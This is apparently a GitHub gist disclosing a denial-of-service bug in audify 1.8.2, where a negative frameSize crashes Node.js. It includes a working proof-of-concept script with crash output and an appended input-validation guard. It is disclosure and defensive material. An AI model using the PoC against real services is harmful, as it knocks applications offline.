@dellalibera
Created January 15, 2024 09:11
Invalid Array Index in audify@v1.8.2

Information

Package: audify

Tested Version: 1.8.2

GitHub Repository: https://github.com/almoghamdani/audify

Vulnerability: Invalid Array Index

Details

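Passing a negative frameSize to new OpusDecoder().decode or new OpusDecoder().decodeFloat makes it possible to set a negative value for an array length, which crashes the process. The frameSize argument is not checked for negative values. As the PoC output below shows, the crash is an uncaught C++ std::bad_array_new_length exception that aborts the Node.js process, so a JavaScript try/catch around the call does not intercept it.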

Vulnerable code:

Setup

Tested on:

Ubuntu 22.04.3 LTS
Node v18.19.0

Installation:

npm install audify

PoC

Usage:

node poc.js <poc1|poc2>
  • poc1
node poc.js poc1
Running poc1
terminate called after throwing an instance of 'std::bad_array_new_length'
  what():  std::bad_array_new_length
Aborted (core dumped)
  • poc2
node poc.js poc2
Running poc2
terminate called after throwing an instance of 'std::bad_array_new_length'
  what():  std::bad_array_new_length
Aborted (core dumped)

Impact

Denial of Service (DoS)

Author

Alessio Della Libera

// poc.js
const { OpusEncoder, OpusDecoder, OpusApplication } = require("audify");

const decoder = new OpusDecoder(48000, 2);
const frameSize = -1; // negative frame size that reaches the native decoder unchecked
const buffer = Buffer.from("A");

// poc1: negative frameSize passed to decode()
function poc1() {
  console.log('Running poc1');
  decoder.decode(buffer, frameSize);
}

// poc2: negative frameSize passed to decodeFloat()
function poc2() {
  console.log('Running poc2');
  decoder.decodeFloat(buffer, frameSize);
}

const pocs = new Map();
pocs.set('poc1', poc1);
pocs.set('poc2', poc2);

function run() {
  const args = process.argv.slice(2);
  const p = args[0];
  const poc = pocs.get(p) || poc1; // defaults to poc1 when no argument is given

  try {
    poc();
  } catch (e) {
    // Not reached: the process aborts in native code before control returns to JS.
    console.log('Never executed');
    console.log(e);
  }

  console.log('Never executed');
}

run();
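
A caller-side guard for the missing check described in Details, as an added example that is not part of the original gist or of audify: it rejects an invalid frameSize with a catchable JavaScript error before the value reaches decode or decodeFloat. The names guardDecoder, checkFrameSize, maxFrameSize and makeStubDecoder are hypothetical, the upper bound of 120 ms of samples (the longest duration one Opus packet can carry) is this example's assumption, and a constructed stub stands in for the native decoder so the block runs without audify installed.

```javascript
// Added example: caller-side frameSize guard (hypothetical helper, not audify code).
const OPUS_MAX_FRAME_MS = 120; // longest audio duration a single Opus packet can carry

function maxFrameSize(sampleRate) {
  return (sampleRate * OPUS_MAX_FRAME_MS) / 1000; // 5760 samples at 48 kHz
}

// Throws a catchable JS error instead of letting a bad value reach native code.
function checkFrameSize(frameSize, sampleRate) {
  if (typeof frameSize !== "number" || !Number.isInteger(frameSize)) {
    throw new TypeError(`frameSize must be an integer, got ${String(frameSize)}`);
  }
  const max = maxFrameSize(sampleRate);
  if (frameSize <= 0 || frameSize > max) {
    throw new RangeError(`frameSize ${frameSize} is outside 1..${max}`);
  }
  return frameSize;
}

// Wraps any object exposing decode(buffer, frameSize) and decodeFloat(buffer, frameSize).
// sampleRate must be the rate the wrapped decoder was constructed with.
function guardDecoder(decoder, sampleRate) {
  const wrap = (method) => (buffer, frameSize) =>
    decoder[method](buffer, checkFrameSize(frameSize, sampleRate));
  return { decode: wrap("decode"), decodeFloat: wrap("decodeFloat") };
}

// Constructed stand-in for the native decoder: it records the calls that would
// have reached native code instead of decoding anything.
function makeStubDecoder() {
  const calls = [];
  const record = (name) => (buffer, frameSize) => {
    calls.push({ name, frameSize });
    return Buffer.alloc(0);
  };
  return { calls, decode: record("decode"), decodeFloat: record("decodeFloat") };
}

// Runs constructed inputs through the guard, including the PoC's frameSize of -1.
function demo() {
  const stub = makeStubDecoder();
  const safe = guardDecoder(stub, 48000);
  const results = [];
  for (const size of [960, -1, 0, 1.5, 10 ** 9]) {
    try { safe.decode(Buffer.from("A"), size); results.push("forwarded"); }
    catch (e) { results.push(e.name); }
  }
  return { results, nativeCalls: stub.calls.length };
}
```

With the real package, the wrapped object would be created as guardDecoder(new OpusDecoder(48000, 2), 48000).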